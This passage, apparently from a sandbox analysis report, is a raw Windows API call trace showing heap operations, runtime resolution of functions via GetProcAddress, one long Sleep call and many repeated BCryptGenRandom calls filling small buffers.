dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0186.615] GetProcessHeap () returned 0x440000 [0186.615] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17fc0 | out: hHeap=0x440000) returned 1 [0186.615] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0186.615] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0186.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0186.616] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0186.616] Sleep (dwMilliseconds=0x1cf61) [0186.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0186.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0186.886] GetProcessHeap () returned 0x440000 [0186.886] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4c40 [0186.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0186.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4c41, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x4d4c41) returned 0x0 [0186.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.097] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.097] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.097] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0187.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4c5f, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x4d4c5f) returned 0x0 [0187.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0187.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0187.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0187.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4c89, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x4d4c89) returned 0x0 [0187.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0187.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0187.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4cac, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x4d4cac) returned 0x0 [0187.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: 